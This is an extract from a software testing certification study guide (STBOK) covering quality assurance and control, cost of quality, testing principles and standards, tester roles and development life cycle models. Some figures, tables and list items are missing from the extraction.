1.1 Vocabulary
A unique characteristic of a profession is its vocabulary. The
Terminology profession’s vocabulary represents the knowledge of the profession
and its ability to communicate with others about the professions
Quality
knowledge. For example, in the medical profession one hundred years
Testing ago doctors referred to “evil spirits” as a diagnosis. Today the medical
Quality Assurance profession has added words such as cancer, AIDS, and stroke, which
communicate knowledge.
This Software Testing Body of Knowledge (STBOK) defines many terms used by software testing
professionals today. To aid in preparing for the certification exam, key definitions have been noted
at the beginning of sections as shown in Figure 1-1. It is suggested you create a separate vocabulary
list and write down the definitions as they are called out in the text. It is also a good practice to use
an Internet search engine to search the definitions and review other examples of those terms.
However, some variability in the definition of words may exist, so for the purpose of preparing for
the examination, a definition given in the STBOK is the correct usage as recognized on the
examination.
Appendix A of the STBOK is a glossary of software testing terms. However, learning them as used
in the appropriate context is the best approach.
activities. This discussion explains the critical difference between control and assurance, and
how to recognize a Quality Control practice from a Quality Assurance practice.
There are many “products” produced from the software development process in addition to
the software itself, including requirements, design documents, data models, GUI screens, and
programs. To ensure that these products meet both requirements and user needs, quality
assurance and quality control are both necessary.
Quality assurance is an activity that establishes and evaluates the processes that produce
products. If there is no need for process, there is no role for quality assurance. Quality
assurance is a staff function, responsible for implementing the quality plan defined through
the development and continuous improvement of software development processes. Quality
assurance activities in an IT environment would determine the need for, acquire, or help
install:
• System development methodologies
• Estimation processes
• System maintenance processes
• Requirements definition processes
• Testing processes and standards
Once installed, quality assurance would measure these processes to identify weaknesses, and
then correct those weaknesses to continually improve the process.
Quality control activities focus on identifying defects in the actual products produced. These
activities begin at the start of the software development process with reviews of requirements
and continue until all testing is complete.
It is possible to have quality control without quality assurance. For example, a test team may
be in place to conduct system testing at the end of development, regardless of whether the
organization has a quality assurance function in place.
The following statements help differentiate between quality control and quality assurance:
• Quality assurance helps establish processes.
• Quality assurance sets up measurement programs to evaluate processes.
• Quality assurance identifies weaknesses in processes and improves them.
• Quality assurance is a management responsibility, frequently performed by a staff
function.
• Quality assurance is concerned with the products across all projects where quality
control is product line focused.
• Quality assurance is sometimes called quality control over quality control because it
evaluates whether quality control is working.
• Quality assurance personnel should never perform quality control unless it is to
validate quality control.
• Quality control relates to a specific product or service.
• Quality control verifies whether specific attribute(s) are in, or are not in, a specific
product or service.
• Quality control identifies defects for the purpose of correcting defects.
Both quality assurance and quality control are separate and distinct from the
internal audit function. Internal Auditing is an independent appraisal activity
within an organization for the review of operations, and is a service to
management. It is a managerial control that functions by measuring and
evaluating the effectiveness of other controls.
There are five perspectives of quality – each of which should be considered as important to
the customer:
Peter R. Scholtes1 introduces the contrast between effectiveness and efficiency. Quality
organizations must be both effective and efficient.
Patrick Townsend2 examines quality in fact and quality in perception as shown in Table 1-1.
Quality in fact is usually the supplier's point of view, while quality in perception is the
customer's. Any difference between the former and the latter can cause problems between the
two.
An organization’s quality policy must define and view quality from their customer's
perspectives. If there are conflicts, they must be resolved.
1. Scholtes, Peter, The Team Handbook, Madison, WI, Joiner Associates, Inc., 1988, p. 2-6.
2. Townsend, Patrick, Commit to Quality, New York, John Wiley & Sons, 1986, p. 167.
The first gap is the producer gap. It is the gap between what was specified to be delivered,
meaning the documented requirements and internal IT standards, and what was actually
delivered. The second gap is between what the producer actually delivered compared to what
the customer expected.
A significant role of software testing is helping to close the two gaps. The IT quality function
must first improve the processes to the point where IT can produce the software according to
requirements received and its own internal standards. The objective of the quality function
closing the producer’s gap is to enable an IT function to provide consistency in what it can
produce. This is referred to as the “McDonald’s effect.” This means that when you go into any
McDonald’s in the world, a Big Mac should taste the same. It doesn’t mean that you as a
customer like the Big Mac or that it meets your needs but rather that McDonald’s has now
produced consistency in its delivered product.
To close the customer’s gap, the IT quality function must understand the true needs of the
user. This can be done by the following:
• Customer surveys
• JAD (joint application development) sessions – the producer and user come together
and negotiate and agree upon requirements
• More user involvement while building information products
• Implementing Agile development strategies
Continuous process improvement is necessary to close the user gap so that there is
consistency in producing software and services that the user needs. Software testing
professionals can participate in closing these “quality” gaps.
The common thread that runs through today's quality improvement efforts is the focus on the
customer and, more importantly, customer satisfaction. The customer is the most important
person in any process. Customers may be either internal or external. The question of customer
satisfaction (whether that customer is located in the next workstation, building, or country) is
the essence of a quality product. Identifying customers' needs in the areas of what, when, why,
and how are an essential part of process evaluation and may be accomplished only through
communication.
The internal customer is the person or group that receives the results (outputs) of any
individual's work. The outputs may include a product, a report, a directive, a communication,
or a service. Customers include peers, subordinates, supervisors, and other units within the
organization. To achieve quality the expectations of the customer must be known.
External customers are those using the products or services provided by the organization.
Organizations need to identify and understand their customers. The challenge is to understand
and exceed their expectations.
An organization must focus on both internal and external customers and be dedicated to
exceeding customer expectations.
There are many strategic and tactical activities that help improve software quality. Listed
below are several such activities that can help the IT development team and specifically the
quality function to improve software quality.
• Explicit software quality objectives: Making clear which qualities are most important
• Explicit quality assurance activities: Ensuring software quality is not just an
afterthought to grinding out ‘code’
• Testing strategy: Planning and conducting both static testing (reviews, inspections)
and dynamic testing (unit, integrations, system and user acceptance testing)
• Software engineering guidelines: Specifying recommendations/rules/standards for
requirements analysis, design, coding and testing
• Informal technical reviews: Reviewing specifications, design, and code alone or with
peers
• Formal technical reviews: Conducting formal reviews at well-defined milestones
(requirements/architecture, architecture/detailed design, detailed design/coding, and
coding/testing)
• External audits: Organizing technical reviews conducted by outside personnel, usually
commissioned by management
• Development processes: Using development processes with explicit risk management
• Change control procedures: Using explicit procedures for changing requirements,
design, and code; documenting the procedures and checking them for consistency
• Measurement of results: Measuring effects of quality assurance activities
The three categories of costs associated with producing quality products are:
• Prevention Costs
Resources required to prevent errors and to do the job right the first time. These
normally require up-front expenditures for benefits that will be derived later. This
category includes money spent on establishing methods and procedures, training
workers, acquiring tools, and planning for quality. Prevention resources are spent
before the product is actually built.
• Appraisal Costs
Resources spent to ensure a high level of quality in all development life cycle stages
which includes conformance to quality standards and delivery of products that meet
the user’s requirements/needs. Appraisal costs include the cost of in-process reviews,
dynamic testing, and final inspections.
• Failure Costs
All costs associated with defective products that have been delivered to the user and/or
moved into production. Failure costs can be classified as either “internal” failure costs
or “external” failure costs. Internal failure costs are costs that are caused by products
or services not conforming to requirements or customer/user needs and are found
before deployment of the application to production or delivery of the product to
external customers. Examples of internal failure costs are: rework, re-testing, delays
within the life cycle, and lack of certain quality factors such as flexibility. Examples of
external failure costs include: customer complaints, lawsuits, bad debt, losses of
revenue, and the costs associated with operating a Help Desk.
Collectively the Preventive Costs and Appraisal Costs are referred to as the “Costs of Control
(Costs of Conformance).” They represent the costs of “good quality.” Failure Costs are
The iceberg diagram illustrated in Figure 1-4 is often used to depict how the more visible CoQ
factors make up only a portion of the overall CoQ costs. When viewing the cost of quality
from a broader vantage point the true costs are revealed.
The Cost of Quality will vary from one organization to the next. The majority of costs
associated with the Cost of Quality are associated with failure costs, both internal and
external. Studies have shown that on many IT projects the cost of quality can make up as
much as 50% of the overall costs to build a product. These studies have shown that of the 50%
Cost of Quality Costs, 3% are Preventive Costs, 7% appraisal Costs, and 40% failure Costs.
The concept of “quality is free” goes to the heart of understanding the costs of quality. If you
can identify and eliminate the causes of problems early, it reduces rework, warranty costs, and
inspections which logically follows that creating quality goods and services does not cost
money, it saves money.
The IT quality assurance group must identify the costs within these three categories, quantify
them, and then develop programs to minimize the totality of these three costs. Applying the
concepts of continuous testing to the systems development process can reduce the Cost of
Quality.
This section addresses the problem of identifying software quality factors that are in addition
to the functional, performance, cost, and schedule requirements normally specified for
software development. The fact that the goals established are related to the quality of the end
product should, in itself, provide some positive influence on the development process.
The software quality factors should be documented in the same form as the other system
requirements. Additionally, a briefing emphasizing the intent of the inclusion of the software
quality factors is recommended.
Figure 1-6 illustrates the Diagram of Software Quality Factors as described by Jim McCall.
McCall produced this model for the US Air Force as a means to help “bridge the gap”
between users and developers. He mapped the user view with the developer’s priority.
McCall identified three main perspectives for characterizing the quality attributes of a software
product. These perspectives are:
In the process of correcting a defect, the correction process itself injects additional defects into
the application system.
Standard Description
CMMI-Dev A process improvement model for software
development.
TMMI A process improvement model for software
testing.
Standard Description
ISO/IEC/IEEE A set of standards for software testing.
29119
ISO/IEC A standard for software product quality
25000:2005 requirements and evaluation (SQuaRE).
ISO/IEC 12119 A standard that establishes requirements for
software packages and instructions on how to
test a software package against those
requirement.
IEEE 829 A standard for the format of documents used
in different stages of software testing.
IEEE 1061 Defines a methodology for establishing quality
requirements, identifying, implementing,
analyzing, and validating the process and
product of software quality metrics.
IEEE 1059 Guide for Software Verification and Validation
Plans.
IEEE 1008 A standard for unit testing.
IEEE 1012 A standard for Software Verification and
Validation.
IEEE 1028 A standard for software inspections
IEEE 1044 A standard for the classification of software
anomalies.
IEEE 1044-1 A guide to the classification of software
anomalies.
IEEE 830 A guide for developing system requirements
specifications.
IEEE 730 A standard for software quality assurance
plans.
IEEE 1061 A standard for software quality metrics and
methodology.
IEEE 12207 A standard for software life cycle processes and
life cycle data.
BS 7925-1 A vocabulary of terms used in software testing.
BS 7925-2 A standard for software component testing.
Testing is NOT:
A number of testing principles have been suggested over the past 40 years. These offer
general guidelines common for all types of testing.
• Testing shows presence of defects
The first principle states that testing can show that defects are present, but cannot
prove that there are no defects. In other words, testing reduces the probability of
undiscovered defects remaining in the software, but, even if no defects are found, it is
not proof of correctness.
• Exhaustive testing is impossible
Testing everything (all combinations of inputs and preconditions) is not feasible
except for the most trivial cases. This implies that instead of spending scarce resources
(both time and money) on exhaustive testing, organizations should use risk analysis
and priorities to focus their testing efforts.
• Early testing
Testing activities should start as early as possible in the software or system
development life cycle and should be focused on defined objectives.
• Defect clustering
Research shows that a small number of modules generally contain most of the defects
discovered during pre-release testing or are responsible for most of the operational
failures. This indicates that software defects are usually found in clusters.
• Pesticide paradox
If the same tests are repeated over and over again, their effectiveness reduces and
eventually the same set of test cases will no longer find any new defects. This is called
the “pesticide paradox.” To overcome this “pesticide paradox,” the test cases need to
be regularly reviewed and revised, and new and different tests need to be written to
exercise different parts of the software or system to potentially find more defects.
• Testing is context dependent
No single test plan fits all organizations and all systems. Testing needs to be done
differently in different contexts. For example, safety-critical software needs to be
tested differently from an e-commerce site.
• Absence-of-errors fallacy
Absence of errors does not mean that the software is perfect. Finding and fixing
defects is of no help if the system build is unusable and does not fulfill the users’ needs
and expectations
• Testing must be traceable to the requirements
Quality is understood as meeting customer requirements. One important principle for
testing, therefore, is that it should be related to the requirements; testing needs to
check that each requirement is met. You should, therefore, design tests for each
requirement and should be able to trace back your test cases to the requirements being
Let’s compare the manufacturing process of producing boxes of cereal to the process of
making software. We find that, as is the case for most food manufacturing companies, testing
each box of cereal produced is unnecessary. However, making software is a significantly
different process than making a box of cereal. Cereal manufacturers may produce 50,000
identical boxes of cereal a day, while each software process is unique. This uniqueness
introduces defects and thus making testing software necessary.
Without a formal division between development and test, an individual may be tempted to
improve the system structure and documentation, rather than allocate that time and effort to
the test.
Each of these factors will be discussed individually to explain how the role of testing in an IT
organization is determined.
With the introduction of the Certified Software Test Engineer (CSTE) certification program in
the early 1990’s, software testing began the long journey towards being recognized as a
profession with specialized skill sets and qualifications. Over the last two decades, some
organizations have come to appreciate that testing must be conducted throughout the
application life cycle and that new development frameworks such as Agile must be considered
if quality software products are to be delivered in today’s fast changing industry.
Unfortunately, while much progress has been made over the last 20+ years, many
organizations still have unstructured testing processes and leave the bulk of software testing as
the last activity in the development process.
The word “testing” conjures up a variety of meanings depending upon an individual’s frame
of reference. Some people view testing as a method or process by which they add value to the
development cycle; they may even enjoy the challenges and creativity of testing. Other people
feel that testing tries a person’s patience, fairness, ambition, credibility, and capability. Testing
can actually affect a person’s mental and emotional health if you consider the office politics
and interpersonal conflicts that are often present.
Some attitudes that have shaped a negative view of testing and testers are:
• Testers hold up implementation, FALSE
• Giving testers less time to test will reduce the chance that they will find defects,
FALSE
• Letting the testers find problems is an appropriate way to debug, FALSE
• Defects found in production are the fault of the testers, FALSE; and
• Testers do not need training; only programmers need training, FALSE!
Although testing is a process, it is very much a dynamic one in that the product and process
will change somewhere with each application under test. There are several variables that
affect the testing process, including the development process itself, software risk, customer/
user participation, the testing process, the tester’s skill set, use of tools, testing budget and
resource constraints, management support, and morale and motivation of the testers. It is
obvious that the people side of software testing has long been ignored for the more process-
related issues of test planning, test tools, defect tracking, and so on.
Testers should perform a self-assessment to identify their own strengths and weaknesses as
they relate to people-oriented skills. They should also learn how to improve the identified
weaknesses, and build a master plan of action for future improvement. Essential testing skills
include test planning, using test tools (automated and manual), executing tests, managing
defects, risk analysis, test measurement, designing a test environment, and designing effective
test cases. Additionally, a solid vocabulary of testing is essential. A tester needs to understand
what to test, who performs what type of test, when testing should be performed, how to
actually perform the test, and when to stop testing.
The scope of testing is the extensiveness of the test process. A narrow scope may be limited to
determining whether or not the software specifications were correctly implemented. The
scope broadens as more responsibilities are assigned to software testers. Among the broader
scope of software testing are these responsibilities:
1. Finding defects early in the software development process, when they can be corrected
at significantly less cost, than detecting them later in the software development process.
2. Removing defects of all types prior to the software going into production, when it is
significantly cheaper, than when the software is operational
In defining the scope of software testing each IT organization must answer the question,
“Why are we testing?”
The traditional view of the development life cycle places testing just prior to operation and
maintenance, as illustrated in Table 1-5. All too often, testing after coding is the only method
used to determine the adequacy of the system. When testing is constrained to a single phase
and confined to the later stages of development, severe consequences can develop. It is not
unusual to hear of testing consuming 50 percent of the project budget. All errors are costly,
but the later in the life cycle that the discovered error is found, the more costly the error. An
error discovered in the latter parts of the life cycle must be paid for four different times. The
first cost is developing the program erroneously, which may include writing the wrong
specifications, coding the system wrong, and documenting the system improperly. Second, the
system must be tested to detect the error. Third, the wrong specifications and coding must be
removed and the proper specifications, coding, and documentation added. Fourth, the system
must be retested to determine that it is now correct.
If lower cost and higher quality systems are the goals of the IT organization, verification must
not be isolated to a single phase in the development process but rather incorporated into each
phase of development.
Studies have shown that the majority of system errors occur in the requirements and design
phases. These studies show that approximately two-thirds of all detected system errors can be
attributed to errors made prior to coding. This means that almost two-thirds of the errors are
specified and coded into programs before they can be detected by validation (dynamic
testing).
The recommended testing process is presented in Table 1-5 as a life cycle chart showing the
verification activities for each phase. The success of conducting verification throughout the
development cycle depends upon the existence of clearly defined and stated products to be
produced at each development stage. The more formal and precise the statement of the
development product, the more amenable it is to the analysis required to support verification.
A more detailed discussion of Life Cycle Testing is found later in this skill category.
Variability in test planning is a major factor affecting software testing today. A plan should be
developed that defines how testing should be performed (see Skill Category 4). With a test
plan, testing can be considered complete when the plan has been accomplished. The test plan
is a contract between the software stakeholders and the testers.
Anything that inhibits the tester’s ability to fulfill their responsibilities is a constraint.
Constraints include:
• Limited schedule and budget
• Lacking or poorly written requirements
• Limited tester skills
• Lack of independence of the test team
Budget and schedule constraints may limit the ability of a tester to complete their test plan.
Embracing a life cycle testing approach can help alleviate budget and schedule problems.
The cost of defect identification and correction increases exponentially as the project
progresses. Figure 1-7 how costs dramatically increase the later in the life cycle you find a
defect. A defect discovered during requirement and design is the cheapest to fix. So, let’s say
it costs x; based on this, a defect corrected during the system test phase costs 10x to fix. A
defect corrected after the system goes into production costs 100x. Clearly, identifying and
correcting defects early is the most cost-effective way to reduce the number of production
level defects.
Testing should begin during the first phase of the life cycle and continue throughout the life
cycle. It’s important to recognize that life cycle testing is essential to reducing the overall cost
of producing software.
Let’s look at the economics of testing. One information services manager described testing in
the following manner, “too little testing is a crime – too much testing is a sin.” The risk of
under testing is directly translated into system defects present in the production environment.
The risk of over testing is the unnecessary use of valuable resources in testing computer
systems where the cost of testing far exceeds the value of detecting the defects.
Most problems associated with testing occur from one of the following causes:
• Failing to define testing objectives
• Testing at the wrong phase in the life cycle
• Using ineffective test techniques
The cost-effectiveness of testing is illustrated in Figure 1-8. As the cost of testing increases,
the number of undetected defects decreases. The left side of the illustration represents an
under test situation in which the cost of testing is less than the resultant loss from undetected
defects.
At some point, the two lines cross and an over test condition begins. In this situation, the cost
of testing to uncover defects exceeds the losses from those defects. A cost-effective
perspective means testing until the optimum point is reached, which is the point where the
value received from testing no longer exceeds the cost of testing.
Few organizations have established a basis to measure the effectiveness of testing. This makes
it difficult to determine the cost effectiveness of testing. Without testing standards, the
effectiveness of the process cannot be evaluated in sufficient detail to enable the process to be
measured and improved.
The use of a standardized testing methodology provides the opportunity for a cause and effect
relationship to be determined and applied to the methodology. In other words, the effect of a
change in the methodology can be evaluated to determine whether that effect resulted in a
smaller or larger number of defects being discovered. The establishment of this relationship is
an essential step in improving the test process. The cost-effectiveness of a testing process can
be determined when the effect of that process can be measured. When the process can be
measured, it can be adjusted to improve its cost-effectiveness for the organization.
If requirements are lacking or poorly written, then the test team must have a defined method
for uncovering and defining test objectives.
A test objective is simply a testing “goal.” It is a statement of what the test team or tester is
expected to accomplish or validate during a specific testing activity. Test objectives, usually
defined by the test manager or test team leader during requirements analysis, guide the
development of test cases, test scripts, and test data. Test objectives enable the test manager
and project manager to gauge testing progress and success, and enhance communication both
within and outside the project team by defining the scope of the testing effort.
Each test objective should contain a statement of the objective, and a high-level description of
the expected results stated in measurable terms. The users and project team must prioritize the
test objectives. Usually the highest priority is assigned to objectives that validate high priority
or high-risk requirements defined for the project. In cases where test time is short, test cases
supporting the highest priority objectives would be executed first.
Test objectives can be easily derived from using the system requirements documentation, the
test strategy, and the outcome of the risk assessment. A couple of techniques for uncovering
and defining test objectives, if the requirements are poorly written, are brainstorming and
relating test objectives to the system inputs, events, or system outputs. Ideally, there should be
less than 100 high level test objectives for all but the very largest systems. Test objectives are
not simply a restatement of the system’s requirements, but the actual way the system will be
tested to assure that the system objective has been met. Completion criteria define the success
measure for the tests.
As a final step, the test team should perform quality control on the test objective process using
a checklist or worksheet to ensure that the process to set test objectives was followed, or
reviewing them with the system users.
Testers should be competent in all skill areas defined in the Software Testing Body of
Knowledge (STBOK). Lack of the skills needed for a specific test assignment constrains the
ability of the testers to effectively complete that assignment. Tester skills will be discussed in
greater detail in Skill Category 2.
The roles and reporting structure of test resources differs across and within organizations.
These resources may be business or systems analysts assigned to perform testing activities, or
they may be testers who report to the project manager. Ideally, the test resources will have a
reporting structure independent from the group designing or developing the application in
order to assure that the quality of the application is given as much consideration as the
development budget and timeline.
Misconceptions abound regarding the skill set required to perform testing, including:
• Testing is easy
While much of this discussion focuses on the roles and responsibilities of an independent test
team, it is important to note that the benefits of independent testing can be seen in the unit
testing stage. Often, successful development teams will have a peer perform the unit testing
on a program or class. Once a portion of the application is ready for integration testing, the
same benefits can be achieved by having an independent person plan and coordinate the
integration testing.
Where an independent test team exists, they are usually responsible for system testing, the
oversight of acceptance testing, and providing an unbiased assessment of the quality of an
application. The team may also support or participate in other phases of testing as well as
executing special test types such as performance and load testing.
An independent test team is usually comprised of a test manager or team leader and a team of
testers. The test manager should join the team no later than the start of the requirements
definition stage. Key testers may also join the team at this stage on large projects to assist with
test planning activities. Other testers can join later to assist with the creation of test cases and
scripts, and right before system testing is scheduled to begin.
The test manager ensures that testing is performed, that it is documented, and that testing
techniques are established and developed. They are responsible for ensuring that tests are
designed and executed in a timely and productive manner, as well as:
• Test planning and estimation
• Designing the test strategy
• Reviewing analysis and design artifacts
• Chairing the Test Readiness Review
• Managing the test effort
• Overseeing acceptance tests
Other testers joining the team will primarily focus on test execution, defect reporting, and
regression testing. These testers may be junior members of the test team, users, marketing or
product representatives.
The test team should be represented in all key requirements and design meetings including:
• JAD or requirements definition sessions
• Risk analysis sessions
• Prototype review sessions
They should also participate in all inspections or walkthroughs for requirements and design
artifacts.
3. Kal Toth, Intellitech Consulting Inc. and Simon Fraser University; list is partially created from lec-
ture notes: Software Engineering Best Practices, 1997.
The Software Engineering Institute (SEI) at Carnegie Mellon University4 points out that with
Ad-hoc Process Models, “process capability is unpredictable because the software process is
constantly changed or modified as the work progresses. Schedules, budgets, functionality, and
product quality are generally (inconsistent). Performance depends on the capabilities of
individuals and varies with their innate skills, knowledge, and motivations. There are few
stable software processes in evidence, and performance can be predicted only by individual
rather than organizational capability.”5
7. Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V. Weber, "Capability Maturity Model
for Software, Version 1.1," Software Engineering Institute, February 1993, p 18.
There are a variety of potential deliverables from each life cycle phase. The primary
deliverables for each Waterfall phase are shown in Table 1-6 along with “What is tested” and
“Who performs the testing.”
Although the Waterfall Model has been used extensively over the years in the production of
many quality systems, it is not without its problems. Criticisms fall into the following
categories:
• Real projects rarely follow the sequential flow that the model proposes.
• At the beginning of most projects there is often a great deal of uncertainty about
requirements and goals, and it is therefore difficult for customers to identify these
criteria on a detailed level. The model does not accommodate this natural uncertainty
very well.
• Developing a system using the Waterfall Model can be a long, painstaking process that
does not yield a working version of the system until late in the process.
1.6.5 VModel
The V-Model is considered an extension of the Waterfall Model. The purpose of the “V”
shape is to demonstrate the relationships between each phase of specification development
and its associated dynamic testing phase. This model clearly shows the inverse relationship
between how products move from high level concepts to detailed program code; then,
dynamic testing begins at the detailed code phase and progresses to the high level user
acceptance test phase.
On the left side of the “V,” often referred to as the specifications side, verification test
techniques are employed (to be described later in this skill category). These verification tests
test the interim deliverables and detect defects as close to point of origin as possible. On the
right hand side of the “V,” often referred to as the testing side, validation test techniques are
used (described later in this skill category). Each of the validation phases test the counter
opposed specification phase to validate that the specification at that level has been rendered
into quality executable code.
The V-Model enables teams to significantly increase the number of defects identified and
removed during the development life cycle by integrating verification tests into all stages of
development. Test planning activities are started early in the project, and test plans are
detailed in parallel with requirements. Various verification techniques are also utilized
throughout the project to:
• Verify evolving work products
Regardless of the development methodology used, understanding the V-model helps the tester
recognize the dependence of related phases within the life cycle.
This allows the development team to demonstrate results earlier on in the process and obtain
valuable feedback from system users. Often, each iteration is actually a mini-Waterfall
process with the feedback from one phase providing vital information for the design of the
next phase. In a variation of this model, the software products which are produced at the end
of each step (or series of steps) can go into production immediately as incremental releases.
The user community needs to be actively involved throughout the project. Even though this
involvement is a positive for the project, it is demanding on the time of the staff and can cause
project delays.
Informal requests for improvement after each phase may lead to confusion -- a controlled
mechanism for handling substantive requests needs to be developed.
8. Kal Toth, Intellitech Consulting Inc. and Simon Fraser University, from lecture notes: Software
Engineering Best Practices, 1997.
The Iterative Model can lead to “scope creep,” since user feedback following each phase may
lead to increased customer demands. As users see the system develop, they may realize the
potential of other system capabilities which would enhance their work.
1.6.8.1 Prototyping
The Prototyping Model was developed on the assumption that it is often difficult to know all
of your requirements at the beginning of a project. Typically, users know many of the
objectives that they wish to address with a system, but they do not know all the nuances of the
data, nor do they know the details of the system features and capabilities. The Prototyping
Model allows for these circumstances and offers a development approach that yields results
without first requiring all the information.
When using the Prototyping Model, the developer builds a simplified version of the proposed
system and presents it to the customer for consideration as part of the development process.
The customer in turn provides feedback to the developer, who goes back to refine the system
requirements to incorporate the additional information. Often, the prototype code is thrown
away and entirely new programs are developed once requirements are identified.
There are a few different approaches that may be followed when using the Prototyping Model:
• Creation of the major user interfaces without any substantive coding in the
background in order to give the users a “feel” for what the system will look like
• Development of an abbreviated version of the system that performs a limited subset of
functions; development of a paper system (depicting proposed screens, reports,
relationships etc.)
• Use of an existing system or system components to demonstrate some functions that
will be included in the developed system9
Criticisms of the Prototyping Model generally fall into the following categories:
• Prototyping can lead to false expectations. Prototyping often creates a situation where
the customer mistakenly believes that the system is “finished” when in fact it is not.
More specifically, when using the Prototyping Model, the pre-implementation
versions of a system are really nothing more than one-dimensional structures. The
necessary, behind-the-scenes work such as database normalization, documentation,
testing, and reviews for efficiency have not been done. Thus the necessary
underpinnings for the system are not in place.
• Prototyping can lead to poorly designed systems. Because the primary goal of
Prototyping is rapid development, the design of the system can sometimes suffer
because the system is built in a series of “layers” without a global consideration of the
integration of all other components. While initial software development is often built
to be a “throwaway,” attempting to retroactively produce a solid system design can
sometimes be problematic.
phase where the user still continues to participate. At this time, traditional phases of coding,
unit, integrations and system test take place. The four phases of RAD are:
3. Construction phase
4. Cutover phase
10.Frank Kand, “A Contingency Based Approach to Requirements Elicitation and Systems Develop-
ment,” London School of Economics, J. System Software 1998; 40: pp. 3-6.
11. Linda Spence, University of Sutherland, “Software Engineering,” available at http://osiris.sunder-
land.ac.uk/rif/linda_spence/HTML/contents.html
12. Kal Toth, Intellitech Consulting Inc. and Simon Fraser University, from lecture notes: Software
Engineering Best Practices, 1997
The risk assessment component of the Spiral Model provides both developers and customers
with a measuring tool that earlier Process Models did not have. The measurement of risk is a
feature that occurs every day in real-life situations, but (unfortunately) not as often in the
system development industry. The practical nature of this tool helps to make the Spiral Model
a more realistic Process Model than some of its predecessors.
Within the Reuse Model, libraries of software modules are maintained that can be copied for
use in any system. These components are of two types: procedural modules and database
modules.
When building a new system, the developer will “borrow” a copy of a module from the
system library and then plug it into a function or procedure. If the needed module is not
available, the developer will build it, and store a copy in the system library for future usage. If
the modules are well engineered, the developer, with minimal changes, can implement them.
A general criticism of the Reuse Model is that it is limited for use in object-oriented
development environments. Although this environment is rapidly growing in popularity, it is
currently used in only a minority of system development applications.
Our highest priority is to satisfy the customer through early and continuous delivery
of valuable software.
Business people and developers must work together daily throughout the project.
Build projects around motivated individuals. Give them the environment and support
they need, and trust them to get the job done.
The most efficient and effective method of conveying information to and within a
development team is face-to-face conversation.
The best architectures, requirements, and designs emerge from self-organizing teams.
13. Kent Beck, Mike Beedle, Arie van Bennekum, Alistair Cockburn, Ward Cunningham, Martin
Fowler, James Grenning, Jim Highsmith, Andrew Hunt, Ron Jeffries, Jon Kern, Brian Marick, Rob-
ert C. Martin, Steve Mellor, Ken Schwaber, Jeff Sutherland, Dave Thomas
At regular intervals, the team reflects on how to become more effective, then tunes
and adjusts its behavior accordingly14
14. 2001, Per the above authors this declaration may be freely copied in any form, but only in its
entirety through this notice.
development cycles lasting from one to three weeks will often see twice daily
integration activity.
• Paired Programming To obtain the benefits of reviews and inspections, as well as
to facilitate the dispersion of the knowledge base, programmers work in pairs. The
pairs may change partners often to promote the collective ownership of code. This is
also supported by the strict adherence to a set of uniform coding standards that makes
code understandable and modifiable by any experienced team member.
• Onsite Customer One of the major issues addressed by the Agile approach is the
need for continuous involvement on the part of the intended product user or a
designated representative. This individual is a part of the team and co-located, making
access a matter of walking across the room. The onsite requirement prevents delays
and confusion resulting from the inability to access the customer or business partner at
critical times in the development process. It also addresses the testing and
requirements issue.
Agile development teams are generally small; Kent Beck15 suggests 10 or fewer. Projects
requiring more people should be broken down into teams of the recommended size. Beck’s
suggestion has led people to think that Agile only works well for small projects, and it often
excels in this area. Many organizations are experimenting with the use of Agile on larger
projects; in fact, Beck’s original project was very large.
One of the key “efficiencies” achieved through the use of Agile methodologies is the
elimination of much of the documentation created by the traditional processes. The intent is
for programs to be self documenting with extensive use of commentary.
This lack of documentation is one of the drawbacks for many organizations considering Agile,
especially those which impact the health and safety of others. Large, publicly traded
corporations involved in international commerce are finding the lack of external
documentation can cause problems when complying with various international laws that
require explicit documentation of controls on financial systems.
Agile development is less attractive in organizations that are highly structured with a
“command and control” orientation. There is less incentive and less reward for making the
organizational and cultural changes required for Agile when the environment exists for
developing a stable requirements base.
This approach allows the organization to respond rapidly to a crisis or opportunity by quickly
deploying an entry level product and then ramping up the functionality in a series of iterations.
Once the initial result has been achieved, it is possible to either continue with the Agile
development, or consider the production product as a “super-prototype” that can either be
expanded or replaced.
The “V-model” as discussed in section 1.6.5 is ideal for describing both verification and
validation test processes in the SDLC. Regardless of the development life cycle model used,
the basic need for verification and validation tests remain.
Validation is accomplished simply by executing a real-life function (if you wanted to check to
see if your mechanic had fixed the starter on your car, you’d try to start the car). Examples of
validation are shown in Table 1-8. As in the table above, the list is not exhaustive.
Determining when to perform verification and validation relates to the development model
used. In waterfall, verification tends to be phase-end with validation during the unit,
integration, system and UAT processes.
The primary goal of software testing is to prove that the user or stakeholder requirements are
actually delivered in the final product developed. This can be accomplished by tracing these
requirements, both functional and non-functional, into analysis and design models, test plans
and code to ensure they’re delivered. This level of traceability also enables project teams to
track the status of each requirement throughout the development and test process.
1.8.3.1 Example
In the design stage of the project, the tracing will continue to design and test models. Again,
reviews for these deliverables will include a check for traceability to ensure that nothing has
been lost in the translation of analysis deliverables. Requirements mapping to system
components drives the test partitioning strategies. Test strategies evolve along with system
mapping. Test cases to be developed need to know where each part of a business rule is
mapped in the application architecture. For example, a business rule regarding a customer
phone number may be implemented on the client side as a GUI field edit for high performance
order entry. In another it may be implemented as a stored procedure on the data server so the
rule can be enforced across applications.
When the system is implemented, test cases or scenarios will be executed to prove that the
requirements were implemented in the application. Tools can be used throughout the project
to help manage requirements and track the implementation status of each one.
The Analytical school sees testing as rigorous and technical. This school places emphasis on
modeling or other more theoretical/analytical methods for assessing the quality of the
software.
The Factory school emphasizes reduction of testing tasks to basic routines or very repetitive
tasks. Outsourcing aligns well with the Factory school approach.
In the Quality school the emphasis is on process and relies heavily on standards. Testing is a
disciplined sport and in the Quality school the test team may view themselves as the
gatekeepers who protects the user from the poor quality software.
In the Context-driven school the emphasis is on adapting to the circumstances under which
the product is developed and used. In this school the focus is on product and people rather
than process.
The Agile school emphasizes the continuous delivery of working product. In this school
testing is code focused testing by programmers. In the Agile school testing is focused on
automated unit tests as used in test-driven development or test-first development.
The introduction of the schools of software testing was not a moment in time event but rather
as the profession matured, diversify of thought evolved, a relatively discrete number of
similar approaches emerged. One school of thought is not suggested as better than the next,
nor are they competitive, but rather a problem solving approach to test software. While
individuals may align themselves with one school or another, the important issue is to
recognize that some approaches may serve a test project better than another. This would not be
based on the personal alignment of the individual but rather the nuances of the project be it a
legacy “big iron” systems or mobile device applications.
sufficient set of test cases from those requirements to ensure that the design and code fully
meet those requirements.
A goal of software testing is to reduce the risk associated with the deployment of an
automated system (the software application). Risk-based testing prioritizes the features and
functions to be tested based on the likelihood of failure and the impact of a failure should it
occur.
